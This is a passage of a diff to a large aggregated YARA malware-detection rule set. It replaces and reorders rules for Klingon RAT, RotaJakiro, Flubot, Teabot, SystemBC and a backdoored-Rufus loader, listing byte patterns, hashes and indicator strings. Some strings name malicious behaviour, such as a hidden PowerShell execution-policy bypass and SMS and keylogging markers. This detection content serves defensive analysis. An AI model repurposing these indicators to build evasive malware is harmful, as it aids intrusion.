-		$s3 = { F0 96 6F 33 59 1B BA 32 82 8D 5C 22 28 B3 1E 4C 65 BA 31 99 4D 1C E0 2E 89 7E F3 1E 94 A7 13 13 08 E7 22 31 7E D7 EB 28 42 53 46 B0 81 73 7C 22 E3 1F 62 4E 17 66 B2 8F 47 A4 CA A2 D6 68 C9 44 36 72 9D 78 7F 7A 16 B5 18 CA 5A 4E F2 92 74 59 }
-		$s4 = { 3D 57 89 56 4D 9E 51 9C CE 2C 20 92 B8 D5 C5 81 7A 8C 65 03 17 F9 C0 77 35 5C 4F 0B 26 B0 99 0B C4 A9 69 5D A9 44 0F 66 F2 2F F7 48 5C 4B 7E 50 9D 41 2C E0 34 AF 89 5F 5B 9E 50 92 C6 F4 65 3C 0B D8 CA 1E CE F3 80 CF EA B8 9E 94 A4 E5 37 72 51 88 0A 34 A3 2F 03 19 CE 41 22 B8 C9 5D 1E F2 82 77 44 AF AB }
-		$s5 = { FA D6 A4 0F EB 79 42 D2 76 F6 54 BA B2 9A 27 FC D0 5E 9E 30 8D 2B 24 E9 A0 AE A8 41 33 06 32 84 51 8C 63 12 33 98 CF 72 36 B0 8B 83 1C E3 12 D7 B8 CD 63 5E 13 B3 A3 FE 45 06 8A D0 80 3E 0C 66 32 33 59 C6 66 0E 10 C1 39 AE F3 84 D7 C4 EF E4 EC C8 37 64 22 17 F9 28 42 45 3A 31 9E A5 EC E1 14 37 79 C0 DB FF FD B6 B3 E7 F3 3B 45 A9 45 28 E3 D9 }
+		$seq1 = { 55 8b ec [3-4] 00 00 [0-5] 56 57 83 3d [4] 25 0f 85 ?? 00 00 00 68 [2] 44 00 ff 15 [2] 42 00 3d f6 65 00 00 0f 85 ?? 00 00 00 6a 00 [0-2] ff 15 2c ?? 42 00 b9 ?? 00 00 00 be [2] 42 00 8d bd f8 f7 ff ff f3 a5 [2-4] 07 00 00 6a 00 8d 85 ?? f8 ff ff 50 e8 [4] 83 c4 0c 8d 4d f8 89 4d fc 6a 00 6a 00 [2-4] 06 00 00 }
+		$seq2 = { ff 15 [2] 42 00 8b ?? f4 c1 ?? 04 89 ?? e4 81 3d [4] 8c 07 00 00 75 1d 6a 00 e8 [4] 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 [2] 42 00 8b 45 f8 01 45 e4 8b ?? f4 03 ?? e8 89 ?? f0 81 3d [4] 96 01 }
+		$seq3 = { 83 bd [2] ff ff 26 75 05 e8 [2] ff ff 83 3d [4] 7a 75 75 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 8d [3] ff ff ?? 8d [3] ff ff ?? 8d [3] ff ff ?? ff 15 [2] 42 00 6a 00 ff 15 [2] 42 00 6a 00 6a 00 ff 15 [2] 42 00 e9 50 ff ff }
+		$seq4 = { 81 bd [2] ff ff 22 3b 00 00 75 [4-5] 42 00 [5-6] 81 3d [4] e5 05 00 00 75 }
 
 	condition:
-		uint32be( 0 ) == 0x504B0304 and filesize > 300KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize > 90KB and all of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Klingon_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_ELF_Rotajakiro_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect the Klingon RAT"
+		description = "Detect the ELF version of RotaJakiro"
 		author = "Arkbird_SOLG"
-		id = "bf114c4d-3010-5b34-954e-82794e30edcb"
-		date = "2021-06-19"
-		modified = "2021-06-21"
-		reference = "https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-20/Klingon/MAL_Klingon_Jun_2021_1.yara#L1-L18"
+		id = "a67f9b64-8778-542f-8481-566a4ffaf5e8"
+		date = "2020-05-07"
+		modified = "2021-05-08"
+		reference = "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-08/RotaJakiro/MAL_ELF_RotaJakiro_May_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "283452d24edea988dc353fada4cd1e050db244a48cc6ab30f70e1900ca9c7c2f"
+		logic_hash = "8e4b9ef8a908a13e738da31b28c879228c3bdc1d8461417b1c1bf31026c98abf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "44237e2de44a533751c0baace09cf83293572ae7c51cb4575e7267be289c6611"
-		hash2 = "c98bb0649262277ec9dd16cf27f8b06042ff552535995f2bdd3355d2adeff801"
-		hash3 = "e8eea442e148c81f116de31b4fc3d0aa725c5dbbbd840b446a3fb9793d0b9f26"
+		hash1 = "0958e1f4c3d14e4de380bda4c5648ab4fa4459ef8f5daaf32bb5f3420217af32"
+		hash2 = "5d753e72ef89f1cef3b7007df812c7a504727816a7b91ecd75cc9acdfb7e9c2e"
+		hash3 = "a18bec90b2b6185362eeb67c516c82dd34cd8f6a7423875921572e97ae1668b0"
+		hash4 = "af2a2be20d7bbec0a9bb4a4dfa898aa18ef4994a9791d7cf37b7b62b379992ac"
+		hash5 = "d38e8f113c36cfa9e05c4d0d6b526d81b69039430c3b1fc64a08a3445b5a5abe"
 		tlp = "White"
-		adversary = "-"
+		adversary = "Oceanlotus"
 
 	strings:
-		$seq1 = { 81 3a 70 72 6f 78 0f 85 [2] 00 00 80 7a 04 79 0f 84 [2] 00 00 48 83 f9 05 75 12 81 3a 73 68 65 6c 75 0a 80 7a 04 6c 0f 84 [2] 00 00 48 83 f9 06 75 14 81 3a 62 69 6e 61 75 0c 66 81 7a 04 72 79 0f 84 [2] 00 00 48 83 f9 03 0f 85 ?? 04 00 00 66 81 3a 63 6d 0f 85 [2] 00 00 80 7a 02 64 0f 84 [2] 00 00 48 83 f9 06 }
-		$seq2 = { 48 8d 05 [3] 00 48 89 ?? 24 [1-4] 48 c7 84 24 ?? 00 00 00 ?? 00 00 00 48 8d 0d [3] 00 48 89 ?? 24 [0-4] 48 c7 ?? 24 }
-		$seq3 = { 48 8d 0d [3] 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 8b 94 24 ?? 00 00 00 48 89 94 24 ?? 00 00 00 48 89 8c 24 ?? 00 00 00 48 89 84 24 ?? 00 00 00 48 8d 05 [3] 00 48 89 04 24 48 c7 44 24 08 08 00 00 00 48 8d 84 24 ?? 00 00 00 48 89 44 24 10 48 c7 44 24 18 03 00 00 00 48 c7 44 24 20 03 00 00 00 e8 [3] ff 48 8b 44 24 30 48 89 44 24 58 48 8b 4c 24 28 48 89 8c 24 ?? 00 00 00 }
+		$seq1 = { 41 57 41 56 41 55 41 54 41 89 f5 55 53 49 89 fc 48 83 ec 58 64 48 8b 04 25 28 00 00 00 48 89 44 24 48 31 c0 e8 77 60 ff ff 89 c7 e8 20 60 ff ff 48 8b 58 20 c6 44 24 10 85 48 8d 7c 24 10 c6 44 24 11 2d c6 44 24 12 c5 ba 22 00 00 00 c6 44 24 13 7a c6 44 24 14 02 be 30 00 00 00 c6 44 24 15 58 c6 44 24 16 30 c6 44 24 17 e4 c6 44 24 18 8a c6 44 24 19 37 c6 44 24 1a bd c6 44 24 1b 68 c6 44 24 1c f6 c6 44 24 1d f8 c6 44 24 1e 6c c6 44 24 1f 8c c6 44 24 20 97 c6 44 24 21 cb c6 44 24 22 73 c6 44 24 23 bd c6 44 24 24 7b c6 44 24 25 19 c6 44 24 26 93 c6 44 24 27 a0 c6 44 24 28 26 c6 44 24 29 26 c6 44 24 2a ae c6 44 24 2b 1c c6 44 24 2c 96 c6 44 24 2d 1d c6 44 24 2e 0f c6 44 24 2f be 44 8b 05 b6 7c 21 00 48 8b 0d b7 7c 21 00 c6 44 24 30 b2 c6 44 24 31 7d c6 44 24 32 48 c6 44 24 33 b9 c6 44 24 34 b6 c6 44 24 35 a4 c6 44 24 36 30 c6 44 24 37 43 c6 44 24 38 06 c6 44 24 39 e3 c6 44 24 3a 4f c6 44 24 3b 06 c6 44 24 3c f5 c6 44 24 3d 87 c6 44 24 3e d5 c6 44 24 3f 6a e8 3a 71 ff ff 48 89 df 48 89 c6 48 89 c5 e8 bc 6c ff ff 45 85 ed 48 89 c3 0f 85 a0 00 00 00 48 89 df e8 58 6e ff ff 85 c0 0f 84 30 01 00 00 8b 05 2a 7c 21 00 48 c7 44 24 08 00 00 00 00 48 83 ec 08 c7 44 24 0c 00 00 00 00 4c 8b 0d 16 7c 21 00 ba 2a 00 00 00 4c 89 e6 bf 01 00 00 00 50 4c 8d 44 24 14 48 8d 4c 24 18 e8 b1 71 ff ff 85 c0 5a }
+		$seq2 = { 41 54 41 b8 08 00 00 00 55 53 b9 00 f3 61 00 ba 42 00 00 00 49 89 fd 49 89 f4 48 83 ec 68 be 50 00 00 00 48 89 e7 c6 04 24 bf c6 44 24 01 cf 64 48 8b 04 25 28 00 00 00 48 89 44 24 58 31 c0 c6 44 24 02 c6 c6 44 24 03 a1 c6 44 24 04 20 c6 44 24 05 76 c6 44 24 06 5d c6 44 24 07 e5 c6 44 24 08 ec c6 44 24 09 87 c6 44 24 0a 45 c6 44 24 0b 26 c6 44 24 0c e1 c6 44 24 0d c8 c6 44 24 0e 8e c6 44 24 0f c0 c6 44 24 10 89 c6 44 24 11 d2 c6 44 24 12 ac c6 44 24 13 c1 c6 44 24 14 01 c6 44 24 15 08 c6 44 24 16 ac c6 44 24 17 8e c6 44 24 18 52 c6 44 24 19 65 c6 44 24 1a c9 c6 44 24 1b 06 c6 44 24 1c be c6 44 24 1d 82 c6 44 24 1e ef c6 44 24 1f 85 c6 44 24 20 9f c6 44 24 21 96 c6 44 24 22 fa c6 44 24 23 65 c6 44 24 24 50 c6 44 24 25 dd c6 44 24 26 0e c6 44 24 27 e0 c6 44 24 28 87 c6 44 24 29 ba c6 44 24 2a 27 c6 44 24 2b f8 c6 44 24 2c ef c6 44 24 2d 5c c6 44 24 2e 60 c6 44 24 2f 07 c6 44 24 30 b1 c6 44 24 31 c5 c6 44 24 32 3d c6 44 24 33 81 c6 44 24 34 df c6 44 24 35 87 c6 44 24 36 64 c6 44 24 37 01 c6 44 24 38 04 c6 44 24 39 9b c6 44 24 3a f9 c6 44 24 3b da c6 44 24 3c 28 c6 44 24 3d f1 c6 44 24 3e 30 c6 44 24 3f cb c6 44 24 40 c8 c6 44 24 41 48 c6 44 24 42 43 c6 44 24 43 e6 c6 44 24 44 e5 c6 44 24 45 f3 c6 44 24 46 c9 c6 44 24 47 8b c6 44 24 48 3c c6 44 24 49 a7 c6 44 24 4a 8b c6 44 24 4b 48 c6 44 24 4c 54 c6 44 24 4d 13 c6 44 24 4e 2b c6 44 24 4f bb e8 a4 aa ff ff bf 00 04 00 00 48 89 c5 e8 77 9a ff ff be 00 04 00 00 48 89 c3 48 89 c7 e8 37 9b ff ff 4c 89 ea 48 }
+		$seq3 = { 48 8d 7c 24 10 c6 44 24 10 fb c6 44 24 11 d0 64 48 8b 04 25 28 00 00 00 48 89 84 24 08 01 00 00 31 c0 c6 44 24 12 8d c6 44 24 13 ac c6 44 24 14 db c6 44 24 15 79 c6 44 24 16 84 c6 44 24 17 52 c6 44 24 18 44 c6 44 24 19 46 c6 44 24 1a 6c c6 44 24 1b d1 c6 44 24 1c ac c6 44 24 1d 31 c6 44 24 1e ca c6 44 24 1f 18 c6 44 24 20 18 c6 44 24 21 90 c6 44 24 22 ec c6 44 24 23 8f c6 44 24 24 a1 c6 44 24 25 74 c6 44 24 26 a8 c6 44 24 27 9a c6 44 24 28 53 c6 44 24 29 d4 c6 44 24 2a a4 c6 44 24 2b 5b c6 44 24 2c 68 c6 44 24 2d c8 c6 44 24 2e dd c6 44 24 2f a5 e8 18 a9 ff ff 48 89 c7 49 89 c5 e8 4d a6 ff ff 83 f8 01 74 40 31 db 4d 85 ed 74 08 4c 89 ef e8 b9 95 ff ff 48 8b 8c 24 08 01 00 00 64 48 33 }
+		$seq4 = { ba 15 00 00 00 be 20 00 00 00 c6 44 24 30 b1 c6 44 24 31 be c6 44 24 32 54 c6 44 24 33 93 c6 44 24 34 29 c6 44 24 35 67 c6 44 24 36 1f c6 44 24 37 b5 c6 44 24 38 a5 c6 44 24 39 ec c6 44 24 3a 18 c6 44 24 3b 53 c6 44 24 3c f0 c6 44 24 3d f1 c6 44 24 3e fe c6 44 24 3f 9f c6 44 24 40 27 c6 44 24 41 8f c6 44 24 42 8d c6 44 24 43 77 c6 44 24 44 1e c6 44 24 45 e1 c6 44 24 46 e1 c6 44 24 47 f0 c6 44 24 48 9e c6 44 24 49 e2 c6 44 24 4a 0d c6 44 24 4b 96 c6 44 24 4c ff c6 44 24 4d 6c c6 44 24 4e b4 c6 44 24 4f 16 e8 09 a8 ff ff 4c 89 ef 48 89 c6 49 89 c4 e8 8b a3 ff ff 48 8d bc 24 90 00 00 00 41 b8 08 00 00 00 b9 00 f3 61 00 ba 69 00 00 00 be 70 00 00 00 48 89 04 24 c6 84 24 90 00 00 00 b3 c6 84 24 91 00 00 00 0b c6 84 24 92 00 00 00 18 c6 84 24 93 00 00 00 fd c6 84 24 94 00 00 00 71 c6 84 24 95 00 00 00 3b c6 84 24 96 00 00 00 b7 c6 84 24 97 00 00 00 fc c6 84 24 98 00 00 00 70 c6 84 24 99 00 00 00 18 c6 84 24 9a 00 00 00 f7 c6 84 24 9b 00 00 00 22 c6 84 24 9c 00 00 00 2d c6 84 24 9d 00 00 00 75 c6 84 24 9e 00 00 00 5d c6 84 24 9f 00 00 00 8f c6 84 24 a0 00 00 00 75 c6 84 24 a1 00 00 00 60 c6 84 24 a2 00 00 00 91 c6 84 24 a3 00 00 00 b3 c6 84 24 a4 00 00 00 1a c6 84 24 a5 00 00 00 0b c6 84 24 a6 00 00 00 00 c6 84 24 a7 00 00 00 5c c6 84 24 a8 00 00 00 6b c6 84 24 a9 00 00 00 8d c6 84 24 aa 00 00 00 ee c6 84 24 ab 00 00 00 3b c6 84 24 ac 00 00 00 7e c6 84 24 ad 00 00 00 67 c6 84 24 ae 00 00 00 72 c6 84 24 af 00 00 00 43 c6 84 24 b0 00 00 00 f6 c6 84 24 b1 00 00 00 14 c6 84 24 b2 00 00 00 32 c6 84 24 b3 00 00 00 c1 c6 84 24 b4 00 00 00 79 c6 84 24 b5 00 00 00 0d c6 84 24 b6 00 00 00 0d c6 84 24 b7 00 00 00 22 c6 84 24 b8 00 00 00 e1 c6 84 24 b9 00 00 00 bd c6 84 24 ba 00 00 00 3f c6 84 24 bb 00 00 00 82 c6 84 24 bc 00 00 00 dd c6 84 24 bd 00 00 00 23 c6 84 24 be 00 00 00 7d c6 84 24 bf 00 00 00 87 c6 84 24 c0 00 00 00 34 c6 84 24 c1 00 00 00 9d c6 84 24 c2 00 00 00 43 c6 84 24 c3 00 00 00 98 c6 84 24 c4 00 00 00 da c6 84 24 c5 00 00 00 e0 c6 84 24 c6 00 00 00 3d c6 84 24 c7 00 00 00 64 c6 84 24 c8 00 00 00 1a c6 84 24 c9 00 00 00 d7 c6 84 24 ca 00 00 00 f5 c6 84 24 cb 00 00 00 5a c6 84 24 cc 00 00 00 c3 c6 84 24 cd 00 00 00 9c c6 84 24 ce 00 00 00 97 c6 84 24 cf 00 00 00 c7 c6 84 24 d0 00 00 00 65 c6 84 24 d1 00 00 00 8f c6 84 24 d2 00 00 00 99 c6 84 24 d3 00 00 00 eb c6 84 24 d4 00 00 00 2f c6 84 24 d5 00 00 00 2b c6 84 24 d6 00 00 00 d0 c6 84 24 d7 00 00 00 d9 c6 84 24 d8 00 00 00 4e c6 84 24 d9 00 00 00 8f c6 84 24 da 00 00 00 7b c6 84 24 db 00 00 00 97 c6 84 24 dc 00 00 00 3b c6 84 24 dd 00 00 00 14 c6 84 24 de 00 00 00 e9 c6 84 24 df 00 00 00 e9 c6 84 24 e0 00 00 00 82 c6 84 24 e1 00 00 00 48 c6 84 24 e2 00 00 00 dc c6 84 24 e3 00 00 00 a3 c6 84 24 e4 00 00 00 75 c6 84 24 e5 00 00 00 ca c6 84 24 e6 00 00 00 e6 c6 84 24 e7 00 00 00 40 c6 84 24 e8 00 00 00 6b c6 84 24 e9 00 00 00 b1 c6 84 24 ea 00 00 00 68 c6 84 24 eb 00 00 00 42 c6 84 24 ec 00 00 00 56 c6 84 24 ed 00 00 00 b4 c6 84 24 ee 00 00 00 ac c6 84 24 ef 00 00 00 2a c6 84 24 f0 00 00 00 fc c6 84 24 f1 00 00 00 34 c6 84 24 f2 00 00 00 fa c6 84 24 f3 00 00 00 1d c6 84 24 f4 00 00 00 1b c6 84 24 f5 00 00 00 9a c6 84 24 f6 00 00 00 62 c6 84 24 f7 00 00 00 b3 c6 84 24 f8 00 00 00 39 c6 84 24 f9 00 00 00 6a c6 84 24 fa 00 00 00 19 c6 84 24 fb 00 00 00 1b c6 84 24 fc 00 00 00 f3 c6 84 24 fd 00 00 00 c5 c6 84 24 fe 00 00 00 d2 c6 84 24 ff 00 00 00 6a e8 55 a4 ff ff 48 89 c7 48 89 c5 e8 4a 92 ff ff 44 8d 7c 03 0a 4d 63 ff 4c 89 ff e8 1a 94 ff ff 4c 89 fe 48 89 c3 48 89 c7 e8 dc 94 ff ff 4c 89 f2 48 89 ee 48 89 df 31 c0 e8 2c 95 ff ff 48 89 da 8b 0a 48 83 c2 04 8d 81 ff fe fe fe f7 d1 21 c8 25 80 80 80 80 74 e9 89 c1 4c 8b 3c 24 48 89 de c1 e9 10 a9 80 80 00 00 0f 44 c1 48 8d 4a 02 4c 89 ff 48 0f 44 d1 89 c1 00 c1 48 83 da 03 48 29 da e8 93 a8 ff ff 4c 89 ff be ed 01 00 00 4c 89 3c 24 e8 d2 aa ff ff 48 8d 44 24 50 41 b8 08 00 00 00 b9 00 f3 61 00 ba 34 00 00 00 be 40 00 00 00 c6 44 24 50 c6 48 89 c7 c6 44 24 51 3b c6 44 24 52 16 c6 44 24 53 01 c6 44 24 54 92 c6 44 24 55 36 c6 44 24 56 81 c6 44 24 57 c8 c6 44 24 58 f3 c6 44 24 59 49 c6 44 24 5a a8 c6 44 24 5b 02 c6 44 24 5c 6f c6 44 24 5d 9d c6 44 24 5e db c6 44 24 5f 61 c6 44 24 60 8a c6 44 24 61 e3 c6 44 24 62 f4 c6 44 24 63 1b c6 44 24 64 33 c6 44 24 65 4d c6 44 24 66 b4 c6 44 24 67 00 c6 44 24 68 f4 c6 44 24 69 76 c6 44 24 6a 70 c6 44 24 6b 56 c6 44 24 6c e2 c6 44 24 6d f3 c6 44 24 6e 5c c6 44 24 6f 73 c6 44 24 70 06 c6 44 24 71 de c6 44 24 72 c5 c6 44 24 73 fa c6 44 24 74 4c c6 44 24 75 7b c6 44 24 76 34 c6 44 24 77 b9 c6 44 24 78 d3 c6 44 24 79 a6 c6 44 24 7a 9b c6 44 24 7b 03 c6 44 24 7c f7 c6 44 24 7d 8e c6 44 24 7e 37 c6 44 24 7f 6a c6 84 24 80 00 00 00 3a c6 84 24 81 00 00 00 97 c6 84 24 82 00 00 00 57 c6 84 24 83 00 00 00 25 c6 84 24 84 00 00 00 2c c6 84 24 85 00 00 00 ac c6 84 24 86 00 00 00 a6 c6 84 24 87 00 00 00 de c6 84 24 88 00 00 00 29 c6 84 24 89 00 00 00 ca c6 84 24 8a 00 00 00 c0 c6 84 24 8b 00 00 00 93 c6 84 24 8c 00 00 00 67 c6 84 24 8d 00 00 00 47 c6 84 24 8e 00 00 00 8d c6 84 24 8f 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and all of ( $seq* )
+		uint32( 0 ) == 0x464c457f and filesize > 10KB and 3 of ( $seq* )
 }
 /*
  * YARA Rule Set
  * Repository Name: Telekom Security
  * Repository: https://github.com/telekom-security/malware_analysis/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: bf832d97e8fd292ec5e095e35bde992a6462e71c
  * Number of Rules: 12
  * Skipped: 0 (age), 5 (quality), 0 (score), 0 (importance)
@@ -153321,97 +153911,6 @@ rule ARKBIRD_SOLG_MAL_Klingon_Jun_2021_1 : FILE
  *
  * NO LICENSE SET
  */
-rule TELEKOM_SECURITY_Android_Flubot : FILE
-{
-	meta:
-		description = "matches on dumped, decrypted V/DEX files of Flubot version > 4.2"
-		author = "Thomas Barabosch, Telekom Security"
-		id = "d6d1eebc-961f-5032-af04-4c95f364a74d"
-		date = "2021-09-14"
-		modified = "2021-09-14"
-		reference = "https://github.com/telekom-security/malware_analysis/"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/flubot.yar#L1-L19"
-		license_url = "N/A"
-		hash = "37be18494cd03ea70a1fdd6270cef6e3"
-		logic_hash = "db22e0890dfad7cb9cb1d18aadb406514e5e8874051aa7f07a4bb93da9db68df"
-		score = 75
-		quality = 45
-		tags = "FILE"
-		version = "20210720"
-
-	strings:
-		$dex = "dex"
-		$vdex = "vdex"
-		$s1 = "LAYOUT_MANAGER_CONSTRUCTOR_SIGNATURE"
-		$s2 = "java/net/HttpURLConnection;"
-		$s3 = "java/security/spec/X509EncodedKeySpec;"
-		$s4 = "MANUFACTURER"
-
-	condition:
-		($dex at 0 or $vdex at 0 ) and 3 of ( $s* )
-}
-rule TELEKOM_SECURITY_Android_Teabot : FILE
-{
-	meta:
-		description = "matches on dumped, decrypted V/DEX files of Teabot"
-		author = "Thomas Barabosch, Telekom Security"
-		id = "9db701bf-be84-5236-97f7-67043cf3ea93"
-		date = "2021-09-14"
-		modified = "2021-09-14"
-		reference = "https://github.com/telekom-security/malware_analysis/"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/teabot.yar#L1-L23"
-		license_url = "N/A"
-		hash = "37be18494cd03ea70a1fdd6270cef6e3"
-		logic_hash = "5aa7fdb191c36510c7698f3eae40c0b7f15c944b8f60113bbb4e40fc926579b8"
-		score = 75
-		quality = 45
-		tags = "FILE"
-		version = "20210819"
-
-	strings:
-		$dex = "dex"
-		$vdex = "vdex"
-		$s1 = "ERR 404: Unsupported device"
-		$s2 = "Opening inject"
-		$s3 = "Prevented samsung power off"
-		$s4 = "com.huawei.appmarket"
-		$s5 = "kill_bot"
-		$s6 = "kloger:"
-		$s7 = "logged_sms"
-		$s8 = "xiaomi_autostart"
-
-	condition:
-		($dex at 0 or $vdex at 0 ) and 6 of ( $s* )
-}
-rule TELEKOM_SECURITY_Win_Systembc_20220311 : FILE
-{
-	meta:
-		description = "Detects unpacked SystemBC module"
-		author = "Thomas Barabosch, Deutsche Telekom Security"
-		id = "39e1a131-bd2c-56e9-961f-2b2c31f29e85"
-		date = "2022-03-13"
-		modified = "2022-03-13"
-		reference = "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/systembc/systembc.yara#L1-L27"
-		license_url = "N/A"
-		logic_hash = "2f6e2c4c786941f800678e22679d4b81d1097a46c2555ae70e745df1b997c1c8"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		sharing = "TLP:WHITE"
-		hash_1 = "c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5"
-		in_memory = "True"
-
-	strings:
-		$sx1 = "-WindowStyle Hidden -ep bypass -file" ascii
-		$sx2 = "BEGINDATA" ascii
-		$sx3 = "GET %s HTTP/1.0" ascii
-		$s5 = "User-Agent:" ascii
-		$s8 = "ALLUSERSPROFILE" ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 2 of ( $sx* ) ) or all of them
-}
 rule TELEKOM_SECURITY_Fake_Gzip_Bokbot_202104
 {
 	meta:
@@ -153531,79 +154030,124 @@ rule TELEKOM_SECURITY_Win_Iceid_Core_202104 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( $internal_name or all of ( $s* ) ) or all of them
 }
-rule TELEKOM_SECURITY_Vatet_Loader_Rufus_Backdoor : DEFRAY777
+rule TELEKOM_SECURITY_Android_Flubot : FILE
 {
 	meta:
-		description = "Detects backdoored Rufus with Vatet Loader of Defray777"
-		author = "Thomas Barabosch, Deutsche Telekom Security"
-		id = "1f6fa228-300c-59de-b89c-3cbdce1b6374"
-		date = "2022-03-18"
-		modified = "2022-03-18"
-		reference = "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/defray777/vatet_loader.yar#L1-L27"
+		description = "matches on dumped, decrypted V/DEX files of Flubot version > 4.2"
+		author = "Thomas Barabosch, Telekom Security"
+		id = "d6d1eebc-961f-5032-af04-4c95f364a74d"
+		date = "2021-09-14"
+		modified = "2021-09-14"
+		reference = "https://github.com/telekom-security/malware_analysis/"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/flubot.yar#L1-L19"
 		license_url = "N/A"
-		logic_hash = "3767398112759689078f992eb272cfec3e59f6d9ca30f8da68c2053e1217fd18"
+		hash = "37be18494cd03ea70a1fdd6270cef6e3"
+		logic_hash = "db22e0890dfad7cb9cb1d18aadb406514e5e8874051aa7f07a4bb93da9db68df"
 		score = 75
-		quality = 20
-		tags = "DEFRAY777"
-		sharing = "TLP:WHITE"
-		hash_1 = "c9c1caae50459896a15dce30eaca91e49e875207054d98e32e16a3e203446569"
-		hash_2 = "0cb8fc89541969304f3bf806e938452b36348bdd0280fc8f4e9221993e745334"
-		in_memory = "False"
+		quality = 45
+		tags = "FILE"
+		version = "20210720"
 
 	strings:
-		$payload_decryption = { 66 0F F8 C1 66 0F EF C2 66 0F F8 C1 }
-		$mz = "MZ" ascii
-		$rufus = "https://rufus.ie/" ascii
+		$dex = "dex"
+		$vdex = "vdex"
+		$s1 = "LAYOUT_MANAGER_CONSTRUCTOR_SIGNATURE"
+		$s2 = "java/net/HttpURLConnection;"
+		$s3 = "java/security/spec/X509EncodedKeySpec;"
+		$s4 = "MANUFACTURER"
 
 	condition:
-		$mz at 0 and $payload_decryption and $rufus
+		($dex at 0 or $vdex at 0 ) and 3 of ( $s* )
 }
-rule TELEKOM_SECURITY_Get_Windows_Proxy_Configuration : CAPABILITY HACKTOOL
+rule TELEKOM_SECURITY_Android_Teabot : FILE
 {
 	meta:
-		description = "Queries Windows Registry for proxy configuration"
+		description = "matches on dumped, decrypted V/DEX files of Teabot"
+		author = "Thomas Barabosch, Telekom Security"
+		id = "9db701bf-be84-5236-97f7-67043cf3ea93"
+		date = "2021-09-14"
+		modified = "2021-09-14"
+		reference = "https://github.com/telekom-security/malware_analysis/"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/teabot.yar#L1-L23"
+		license_url = "N/A"
+		hash = "37be18494cd03ea70a1fdd6270cef6e3"
+		logic_hash = "5aa7fdb191c36510c7698f3eae40c0b7f15c944b8f60113bbb4e40fc926579b8"
+		score = 75
+		quality = 45
+		tags = "FILE"
+		version = "20210819"
+
+	strings:
+		$dex = "dex"
+		$vdex = "vdex"
+		$s1 = "ERR 404: Unsupported device"
+		$s2 = "Opening inject"
+		$s3 = "Prevented samsung power off"
+		$s4 = "com.huawei.appmarket"
+		$s5 = "kill_bot"
+		$s6 = "kloger:"
+		$s7 = "logged_sms"
+		$s8 = "xiaomi_autostart"
+
+	condition:
+		($dex at 0 or $vdex at 0 ) and 6 of ( $s* )
+}
+rule TELEKOM_SECURITY_Win_Systembc_20220311 : FILE
+{
+	meta:
+		description = "Detects unpacked SystemBC module"
 		author = "Thomas Barabosch, Deutsche Telekom Security"
-		id = "b67b0b70-a95f-5c65-a522-ef4f41e36159"
-		date = "2022-01-14"
-		modified = "2023-12-12"
-		reference = "https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-ie-clientnetworkprotocolimplementation-hklmproxyserver"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L44-L57"
+		id = "39e1a131-bd2c-56e9-961f-2b2c31f29e85"
+		date = "2022-03-13"
+		modified = "2022-03-13"
+		reference = "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/systembc/systembc.yara#L1-L27"
 		license_url = "N/A"
-		logic_hash = "db52782a56d42f6e460466ea46993490bbbceeb7422d45211f064edb2e37a8eb"
+		logic_hash = "2f6e2c4c786941f800678e22679d4b81d1097a46c2555ae70e745df1b997c1c8"
 		score = 75
 		quality = 70
-		tags = "CAPABILITY, HACKTOOL"
+		tags = "FILE"
+		sharing = "TLP:WHITE"
+		hash_1 = "c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5"
+		in_memory = "True"
 
 	strings:
-		$a = "Software\\Microsoft\\Windows\\Currentversion\\Internet Settings" ascii wide
-		$b = "ProxyEnable" ascii wide
-		$c = "ProxyServer" ascii wide
